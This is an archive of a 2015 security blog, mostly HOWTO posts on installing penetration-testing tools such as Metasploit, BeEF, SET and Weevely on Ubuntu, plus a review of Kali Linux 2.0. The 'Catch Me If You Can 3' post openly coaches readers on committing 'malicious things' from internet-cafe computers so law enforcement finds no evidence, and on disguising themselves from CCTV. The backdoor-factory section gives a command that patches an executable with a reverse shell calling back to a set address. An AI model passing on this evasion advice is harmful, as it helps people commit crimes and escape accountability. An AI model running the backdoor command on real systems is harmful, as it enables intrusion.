Saturday, August 29, 2015

HOWTO : Commix on Ubuntu 14.04 LTS

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/stasinopoulos/commix.git
cd commix
python commix.py -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/commix
python commix.py --update



Reference

Wiki


That's all! See you.


HOWTO : HconSTF on Ubuntu 14.04

Hcon Security Testing Framework (HconSTF) is Web Application Security Analysis & Penetration Testing Framework made of mozilla technologies.

Most of the part of HconSTF is semi-automated but you still need your brain to work it out. It can be use in all kind of security testing stages, it has tools for conducting tasks like,

- Web Penetration Testing
- Web Exploits Development
- Web Malware Analysis
- Open Source Intelligence ( Cyber Spying & Doxing )


Install

cd ~
mkdir arsenal
cd arsenal


For x86_64 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Prime_Linux_x64.tar.bz2
tar -jxvf HconSTF_v0.5_Prime_Linux_x64.tar.bz2
cd HconSTF
sudo ./HconSTF


For x86 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Linux_x86.tar.bz2
tar -jxvf HconSTF_v0.5_Linux_x86.tar.bz2
cd HconSTF
sudo ./HconSTF



Update/Upgrade

rm -R ~/arsenal/HconSTF

Go to the official site to download the latest version and repeat the Install procedure.


Reference

User Manual (PDF)


That's all! See you.


HOWTO : PTF on Ubuntu 14.04 LTS

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustom to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minute.


Install


sudo apt-get install git

cd ~
git clone https://github.com/trustedsec/ptf.git
cd ptf
sudo ./ptf


If you want to install and/or update everything :

use modules/install_update_all
run



All the modules (pentesting tools) are installed at /pentest directory. Please note that WINE and i386 dependencies will be installed accordingly.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

PTF will try to update itself on every start up. Meanwhile, you can run PTF at any directory after the first run.

If you want to update everything :

sudo ptf
use modules/install_update_all
run



Reference

Video

Documentation


That's all! See you.


Friday, August 28, 2015

Catch Me If You Can 3

Last year, I was talking about how to use NightHawk to do malicious things. The full article is here. Two years ago, I also talked about using pre-paid SIM card to do malicious things and the full article is here. However, you think that it would be a chance to be caught as TOR network exit nodes may be monitoring by law enforcements. Meanwhile, identity registration may be needed to purchase SIM card in your country. Okay, today I will introduce another method that you can use wired network to do malicious things untraceable.

In my country, there are many "Internet Cafe" which have a pool of computer systems that running Windows system to provide network gaming or internet services to their customers with a cheap price per hour. Those computer systems will be equipped "Reborn Card" which can reset to its default setting on every reboot. Normally, the "Internet Cafe" will reboot their computer systems every day.

You can hire a computer system in the "Internet Cafe", reboot it. Plug in your Kali Linux or BackBox Linux Live USB (or your custom made pentesting Linux Live USB). Personally, I will recommend BackBox as it will have some outstanding features, such as memory wiper.

After your malicious tasks, you can reboot your computer system and it will reset to its default setting. Normally, no data or activiities will be logged in the computer system.

When law enforcements trace your IP address which will direct them to the "Internet Cafe", they cannot obtain any evidence from the computer pool as those systems are reborned!

Finally, beware that CCTV will be installed in the "Internet Cafe" or nearby shops which will capture your present. You may need to do some "make up" when necessary.

That's all! See you.

See Also

Catch Me If You Can
Catch Me If You Can 2
Catch Me If You Can 4

HOWTO : OpenVAS on Ubuntu 14.04 LTS

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.


Install

To install OpenVAS 8 on Ubuntu 14.04 LTS :

sudo add-apt-repository ppa:mrazavi/openvas

sudo apt-get update
sudo apt-get install xsltproc sqlite3 openvas

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress


To run it :

Open browser to point to https://localhost:443

* username and password are both "admin"


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress



Reference

You can disable OpenVAS auto startup on every boot and start it manually. Please note that if OpenVAS is running, shutdown process will take time.

For example :

sudo update-rc.d openvas-scanner disable
sudo update-rc.d openvas-manager disable


To start up manually :

sudo service openvas-scanner start
sudo service openvas-manager start


To stop manually :

sudo service openvas-scanner stop
sudo service openvas-manager stop



That's all! See you.


HOWTO : the-backdoor-factory on Ubuntu 14.04 LTS

The Backdoor Factory (BDF) is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.


Install

sudo apt-get install git python-pip build-essential

Install BDFactory :

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
sudo pip install capstone
sudo ./install.sh


How to run it :

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp

Install BDFProxy :

cd ~/arsenal
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
sudo ./install.sh


How to run it :

nano bdfproxy.cfg

*change the settings when necessary

./bdf_proxy.py

msfconsole -r bdfproxy_msf_resource.rc



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/the-backdoor-factory
sudo ./update.sh

cd ~/arsenal/BDFProxy
sudo ./update.sh



Reference

See also : Metaspolit Framework


That's all! See you.


HOWTO : SPIKE on Ubuntu 14.04 LTS

SPIKE is a fuzzer to find exploitable bugs on application programs.


Install

sudo apt-get install build-essential

cd ~
mkdir arsenal
cd arsenal
wget http://www.immunitysec.com/downloads/SPIKE2.9.tgz
tar -xzvf SPIKE2.9.tgz
cd SPIKE/src
./configure
make



* For how to use it, please refer to the links at "Reference" below.


Update/Upgrade

Nil


Reference

An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities

Fuzzer Automation with SPIKE


* Or, read the documents at ~/arsenal/SPIKE/SPIKE/documentations


That's all! See you.


HOWTO : MACchanger on Ubuntu 14.04 LTS

A GNU/Linux utility for viewing/manipulating the MAC address of network interfaces.


Install

sudo apt-get install macchanger

macchanger -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade



Reference

Nil


That's all! See you.


HOWTO : edb-debugger on Ubuntu 14.04 LTS

edb is a cross platform x86/x86-64 debugger. It was inspired by Ollydbg, but aims to function on x86 and x86-64 as well as multiple OS's. Linux is the only officially supported platform at the moment, but FreeBSD, OpenBSD, OSX and Windows ports are underway with varying degrees of functionality.


Install

sudo apt-get install git build-essential libboost1.55-all-dev qt5-default libqt5xmlpatterns5-dev

cd ~
mkdir arsenal
cd arsenal
git clone --recursive https://github.com/eteran/edb-debugger.git
cd edb-debugger
./travis_install_capstone.sh
qmake
make
sudo make install
cd ~
mkdir .edb
sed -i -e 's/directory.session.path=/directory.session.path=\/home\/$USER\/.edb/g' ~/.config/codef00.com/edb.conf
sed -i -e 's/directory.symbol.path=/directory.symbol.path=\/home\/$USER\/.edb/g' ~/.config/codef00.com/edb.conf
edb



*** Thanks for Vladimir Stupnikov pointed out the installation error. ***


Update/Upgrade

cd ~/arsenal
rm -R edb-debugger


Repeat the Install procedure as previous mentioned.


Reference

Wiki


That's all! See you.


Thursday, August 27, 2015

HOWTO : Arachni on Ubuntu 14.04 LTS

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.

Unlike other scanners, it takes into account the dynamic nature of web applications, can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity and is able to adjust itself accordingly. This way, attack/input vectors that would otherwise be undetectable by non-humans can be handled seamlessly.

Moreover, due to its integrated browser environment, it can also audit and inspect client-side code, as well as support highly complicated web applications which make heavy use of technologies such as JavaScript, HTML5, DOM manipulation and AJAX.

Finally, it is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.


Install

cd ~
cd arsenal
wget https://github.com/Arachni/arachni/releases/download/v1.2.1/arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz
tar -xvzf arachni-1.2.1-0.5.7.1-linux-x86_64.tar.gz
cd arachni-1.2.1-0.5.7.1/bin
./arachni_web


Start Firefox and point to http://127.0.0.1:9292

* Default credentials are as the following :

Administrator account

E-mail: admin@admin.admin
Password: administrator

Regular user account

E-mail: user@user.user
Password: regular_user


Update/Upgrade

rm -R ~/arsenal/arachni-1.2.1-0.5.7.1

Then repeat the Install procedure but to download the latest version.


Reference

Wiki


That's all! See you.


Sunday, August 23, 2015

HOWTO : NoSQLMap on Ubuntu 14.04 LTS

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases as well as web applications using NoSQL in order to disclose data from the database.

It is named as a tribute to Bernardo Damele and Miroslav's Stampar's popular SQL injection tool sqlmap, and its concepts are based on and extensions of Ming Chow's excellent presentation at Defcon 21, "Abusing NoSQL Databases". Presently the tool's exploits are focused around MongoDB, but additional support for other NoSQL based platforms such as CouchDB, Redis, and Cassandra are planned in future releases.


Install

sudo apt-get install git python-setuptools

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/tcstool/nosqlmap.git
cd nosqlmap
sudo python setup.py install
python nosqlmap.py



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/nosqlmap
git pull origin master
python setup.py install --force



Reference

GitHub
Videos

See also : Metasploit Framework


That's all! See you.


HOWTO : BeEF on Ubuntu 14.04 LTS

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.


Install

sudo apt-get install git curl git libsqlite3-dev sqlite3 imagemagick ghostscript

Install Ruby :

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.5
ruby -v


Install BeEF :

cd ~
mkdir arsenal
cd arsenal
git clone git://github.com/beefproject/beef.git

cd beef
rvm use ruby-2.1.5@beef --create
gem install bundler
bundle install
./beef


Open browser at go to http://127.0.0.1:3000/ui/panel
* username is "beef" while password is "beef".

* BeEF is default using Ruby 2.1.5.


Update/Upgrade

cd ~/arsenal/beef
git pull origin master
bundle install
./update-beef



Reference

Videos

See also : Metasploit Framework


That's all! See you.


HOWTO : SET on Ubuntu 14.04 LTS

The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.


Install

sudo apt-get install git python-impacket

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit


sudo python setup.py install

Edit the Metasploit path :

nano /etc/setoolkit/set.config
METASPLOIT_PATH=/home/samiux/arsenal/metasploit-framework


* Please replace your path

To run it :

sudo setoolkit


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo seupdate



Reference

See also : Metasploit Framework


That's all! See you.


HOWTO : Metasploit Framework on Ubuntu 14.04 LTS

Metasploit is an exploitation framework.


Install

sudo apt-get install git build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev default-jre git autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev xtightvncviewer libyaml-dev curl zlib1g-dev libffi-dev libgmp-dev

cd ~
mkdir arsenal
cd arsenal

Install Ruby :

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.6
rvm use 2.1.6 --default
ruby -v


* Metasploit Framework use ruby 2.1.6 by default

Install NMap :

* Install NMap if you do not have it installed; otherwise, skip it.

cd ~/arsenal
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install


Configure PostgreSQL :

sudo -s
su postgres

createuser msf -P -S -R -D

* enter "msf" as password
createdb -O msf msf
exit
exit


Install Metasploit Framework :

cd ~/arsenal
git clone https://github.com/rapid7/metasploit-framework.git
cd metaploit-framework
rvm --default use ruby-2.1.6@metasploit-framework --create
gem install bundler
bundle install


Configure Metasploit :

cp ~/arsenal/metasploit-framework/config/database.yml.example ~/arsenal/metasploit-framework/config/database.yml
nano ~/arsenal/metasploit-framework/config/database.yml

development: &pgsql
  adapter: postgresql
  database: msf
  username: msf
  password: msf
  host: localhost
  port: 5432
  pool: 75
  timeout: 5

sudo sh -c "echo export MSF_DATABASE_CONFIG=/home/samiux/arsenal/metasploit-framework/config/database.yml >> /etc/profile"

source /etc/profile


* please rename the /home/samiux to your name.

To run it :

cd ~/arsenal
cd metasploit-framework
sudo service postgresql start
msfconsole
sudo service postgresql stop



Update/Ugrade

sudo apt-get update
sudo apt-get dist-upgrade
cd ~/arsenal/metasploit-framework
git pull origin master
msfupdate



Reference

See also : NMap


That's all! See you.


Saturday, August 22, 2015

HOWTO : John on Ubuntu 14.04 LTS

John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.


Install

sudo apt-get install build-essential libssl-dev

cd ~
mkdir arsenal
cd arsenal

wget http://www.openwall.com/john/j/john-1.8.0-jumbo-1.tar.gz
tar -xvzf john-1.8.0-jumbo-1.tar.gz
cd john-1.8.0-jumbo-1/src

./configure
make clean
make

cd ../run
./john --help



* you can also install by sudo apt-get install john john-data


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade


Go to Official site to download the source and compile it as mentioned above.


Reference

Please install Nvidia or AMD Graphic related drivers before installing John when necessary.


That's all! See you.


HOWTO : NetCat on Ubuntu 14.04 LTS

Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Netcat, or "nc" as the actual program is named, should have been supplied long ago as another one of those cryptic but standard Unix tools.


Install

sudo apt-get install netcat-traditional
sudo update-alternatives --config nc


select /bin/nc.traditional by entering "2"

nc -h


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade



Reference

Nil


That's all! See you.


HOWTO : CMSMap on Ubuntu 14.04 LTS

CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are WordPress, Joomla and Drupal.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/Dionach/CMSmap.git
cd CMSmap
python cmsmap.py -t http://www.google.com



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/CMSmap
git pull origin master



Reference

Nil


That's all! See you.


Thursday, August 20, 2015

HOWTO : ZAP on Ubuntu 14.04 LTS

The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.

It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.

ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.


Install

sudo apt-get install default-jre unzip

cd ~
mkdir arsenal
cd arsenal

wget https://github.com/zaproxy/zaproxy/releases/download/w2015-08-12/ZAP_WEEKLY_D-2015-08-12.zip
unzip ZAP_WEEKLY_D-2015-08-12.zip
rm ZAP_WEEKLY_D-2015-08-12.zip
cd ZAP_D-2015-08-12
./zap.sh



* ZAP_WEEKLY_D-2015-08-12.zip as example.
* ZAP Team generate weekly releases of ZAP from the trunk, typically every Monday.
These are just intended for people who want to use all of the features we've added since the last 'full' release but dont want the hassle of building ZAP from the source code.
While we endeavor to ensure that weekly releases are robust, things may be broken or only partially implemented.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade


cd ~/arsenal/

Go to Download to download ZAP Weekly and repeat the procedure of "Install" previously mentioned.


Reference

Wiki

Video


That's all! See you.

HOWTO : Burp Suite on Ubuntu 14.04 LTS

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.


Install

sudo apt-get install curl default-jre

cd ~
mkdir arsenal
cd arsenal
mkdir burpsuite
cd burpsuite
curl https://portswigger.net/DownloadUpdate.ashx?Product=Free -o burpsuite_free.jar
java -jar -Xmx1024m burpsuite_free.jar



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/burpsuite
rm burpsuite_free.jar
curl https://portswigger.net/DownloadUpdate.ashx?Product=Free -o burpsuite_free.jar



Reference

Getting Started

Documentation

See also : Professional Edition


That's all! See you.

Wednesday, August 19, 2015

HOWTO : Weevely on Ubuntu 14.04 LTS

Weevely is a command line web shell dynamically extended over the network at runtime designed for remote administration and pen testing. It provides a weaponized telnet-like console through a PHP script running on the target, even in restricted environments.

The low footprint agent and over 30 modules shape an extensible framework to administrate, conduct a pen-test, post-exploit, and audit remote web accesses in order to escalate privileges and pivot deeper in the internal networks.


Install

sudo apt-get install git build-essential python-pip libyaml-dev python-dev
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/epinna/weevely3.git
cd weevely3
./weevely.py



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade
sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade

cd ~/arsenal/weevely3
git pull origin master



Reference

Wiki


That's all! See you.

Tuesday, August 18, 2015

HOWTO : SQLMap on Ubuntu 14.04 LTS

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python sqlmap.py -hh



Update/Upgrade

cd ~/arsenal/sqlmap
python sqlmap.py --update



Reference

Wiki

See also : SQLMap Web GUI


That's all! See you.

HOWTO : THC-Hydra on Ubuntu 14.04 LTS

Number one of the biggest security holes are passwords, as every password security study shows.

THC-Hydra is a proof of concept code, to give researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from remote to a system.

Install

sudo apt-get install git build-essential libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncurses5-dev libafpclient-dev

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
./hydra -h
./xhydra



* Oracle, NCP and SAP/R3 are not supported in this build as there are no libraries available from the repos
* you can install by sudo apt-get install hydra hydra-gtk


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/thc-hydra
git pull origin master
make clean
./configure
make



Reference

Official site


That's all! See you.

HOWTO : NMap on Ubuntu 14.04 LTS

Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Nmap is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Install

sudo apt-get install git build-essential

cd ~
mkdir arsenal
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install
sudo nmap -sS -sV 192.168.0.100



* or you can install by sudo apt-get install nmap


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/nmap
git pull origin master
make clean
make
sudo make install



Reference

Reference Guide


That's all! See you.

HOWTO : Masscan on Ubuntu 14.04 LTS

Masscan is the fastest Internet port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second.

It produces results similar to nmap, the most famous port scanner. Internally, it operates more like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is that it's faster than these other scanners. In addition, it's more flexible, allowing arbitrary address ranges and port ranges.

NOTE: masscan uses a custom TCP/IP stack. Anything other than simple port scans will cause conflict with the local TCP/IP stack. This means you need to either use the -S option to use a separate IP address, or configure your operating system to firewall the ports that masscan uses.


Install

To install Masscan on Ubuntu 14.04.03 LTS Desktop :

sudo apt-get install git build-essential libpcap-dev

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/robertdavidgraham/masscan.git
cd masscan
make
sudo bin/masscan -p80,8000-8100 10.0.0.0/8



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/masscan
git pull origin master
make clean
make



Reference

Official site

Wiki


That's all! See you.


HOWTO : Spiderfoot on Ubuntu 14.04 LTS

SpiderFoot is an open source intelligence automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname or network subnet.

SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target or defensively to identify what information your organisation is freely providing for attackers to use against you.


Install

To install Spiderfoot on Ubuntu 14.04.3 LTS Desktop :

sudo apt-get install git python-dev python-pip python-m2crypto python-netaddr python-pypdf python-stem python-lxml

sudo pip install cherrypy mako


cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/smicallef/spiderfoot.git
cd spiderfoot
python sf.py


Then, use your Firefox to browse http://127.0.0.1:5001/


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo pip install cherrypy mako--upgrade

cd ~/arsenal/spiderfoot
git pull origin master


Reference

Documentation


That's all! See you.

HOWTO : Recon-ng on Ubuntu 14.04 LTS

Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng!


Install

To install Recon-ng on Ubuntu 14.04.3 LTS Desktop :

sudo apt-get install git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml

sudo pip install dicttoxml


cd ~
mkdir arsenal
cd arsenal
git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
cd recon-ng
./recon-ng



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo pip install dicttoxml --upgrade

cd ~/arsenal/recon-ng
git pull origin master



Reference

Usage Guide

Development Guide


That's all! See you.

Wednesday, August 12, 2015

REVIEW : First Impression on Kali Linux 2.0

*** Please note that all the tests are testing on Linux host (Ubuntu 14.04.3), Windows host may have some different results. ***

*** Updated on August 14, 2015 : VirtualBox 5.0.2 for Linux fixed the slow speed (VMM: fixed an issue causing artifically high load averages on Linux hosts). ***

Kali Linux 2.0 is released on today (August 11, 2014 EST). I downloaded 64-bit full version and installed it on VirtualBox 5.0. The host computer has Intel Celeron(R) CPU N2930 @ 1.83GHz × 4 and 8 GB RAM. I assigned 5 GB RAM to Kali Linux 2.0. It is quite slow for it to run with 5GB RAM on my VirtualBox 5.0. Meanwhile, the sound always mute on every start up even you have set it before.





(A) Installation

When installing via non-graphic interface, you may encounter no network mirror repos, you need to bypass it by selecting "Continue without a network mirror? Yes" and we will edit the /etc/apt/sources.list later. Graphic interface may also has the same problem too.

After the installation is completed, we can edit the /etc/apt/sources.list if you encountered no mirror repos when install.

nano /etc/apt/sources.list

The content of the file should be looking like this :

deb http://http.kali.org/kali sana main non-free contrib
deb-src http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free


(B) Install VirtualBox 5.0 Guest Additions CD

When you are going to install VirtualBox 5.0 Guest Additions CD, you need to install dkms first :

apt-get install dkms

* It will also install related headers files. If not, you need to install the headers files yourself.

When install VirtualBox Guest Additions CD, you may encounter the following error :

*** Error in `systemctl': double free or corruption (fasttop): 0x00007fc0cb648ae0 ***

It should be systemctl error. I do not know what it will be affected so far. After checking the dmesg message, the error is due to :

systemd[1]: Cannot add dependency job for unit vboxadd-service.service, ignoring: Unit vboxadd-service.service failed to load: No such file or directory.

It is recommended to uninstall the Guest Additions CD at the moment and some features will be not available on the guest virtual machine.

(C) Uninstall VirtualBox 5.0 Guest Additions CD

To uninstall VirtualBox Guest Additions, run :

/opt/VBoxGuestAdditions-5.0.0/uninstall.sh

This error will show again :

*** Error in `systemctl': double free or corruption (fasttop): 0x00007f124e3f2ae0 ***

(D) Not working properly applications

The following applications are launched from the Quick Menu on the left hand side of the screen.

armitage - it cannot be launched
Maltego - it launches but it cannot be operated and it cannot be quit too
BeEF - it shows an error and no login screen is displayed UNLESS you start the "beef start" at "System Services" under "Applications" menu

There may be some more other applications that cannot work, such as "system log", "VLC media player", "ImageMagick" and etc. I cannot test them all one by one as they are too many.

* Even the VirtualBox Guest Additions is uninstalled or reinstall the Kali 2.0, the captioned applications still do not working properly

** Other applications on the Applications menu are not tested as well as those are not in the Applications menu

*** Running BeEF, it produces the following error :
(process:1371): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size = 0' failed

(E) Conclusion

Kali Linux 2.0 is not well tested before it is released. It is very disappointed. Kali 2.0 is slower than 1.1.0a on the same testing machine. Or you may need a more powerful computer or laptop to do with it. Some applications cannot be running properly on the Quick Menu in this release. DISAPPOINTED!

That's all! See you.


Update on August 12, 2015

I conducted a random test on Kali Linux 2.0, I found the following :

redis-server is running in the background.

Apache2 is listening on TCP6 only instead of TCP4 and TCP6 at the same time.

OpenVAS cannot be started properly via "Applications", "System services", "openvas start". Systemd error produced.

It seems that systemd is buggy.


Update on August 13, 2015

After talking with the founder of Offensive Security (muts), I going to install Kali Linux 2.0 to other virtual machine software to see the result.

I try to install Kali Linux 2.0 on VMWare Workstation 11 for Linux on a laptop (Lenovo Thinkpad X200 with 4GB RAM) but it failed in the middle and the installation never completed. I do not have Workstation 12, so I cannot test it.

Then, I pick up another laptop (Lenovo Thinkpad X201s with 8GB RAM) which is running VirtualBox 4.3.30 on Ubuntu 14.04. I assigned 4GB RAM to Kali. The installation is smooth. May be the Kali Linux repos server is out of the DDoS. (Kali Linux repos server has been DDoS for hours since it is released according to the founder of Offensive Security).

The VirtualBox Guest Additions CD is installed without problem. However, "armitage", "system log", "VLC media player" and "ImageMagick" do not launched. Meanwhile, "redis-server" is running in the background; "Apache2" is listening on TCP6 only. "systemd" errors will be produced on selecting "openvas start".

On the other hand, "Maltego" and "BeEF" are working properly with only one click.

Kali Linux 2.0 is running fast and responsive on VirtualBox 4.3.30.

Some users at #kali-linux (IRC channel) found some weird problems, such as "thin.services" is running and making the system very slow.

Ubuntu 14.04.4 desktop is running smoothly on VirtualBox 5.0. It is suspected that Kali Linux 2.0 selects hardware and virtual machine software.

The conclusion is changed to ACCEPTABLE! Kali Linux Team should be doing better.


Update on August 13, 2015 (Part 2)

This time, I want to test Kali Linux 2.0 VirtualBox 64-bit image and it is running 2GB RAM and 30GB hard drive.

There is a "kali-proposed-updates.list" at /etc/apt/sources.list.d/ and the content is :

deb http://http.kali.org/kali sana-proposed-updates main contrib non-free

Running on VirtualBox 5.0 on Ubuntu 14.04.3 host :

"armitage" cannot be launched.
"maltego" cannot run properly and it cannot be quit.
"BeEF" launched but no login screen UNLESS run "beef start" at "System services" under "Applications".

"VLC media player" and "ImageMagick" do not work.
"system log" works.
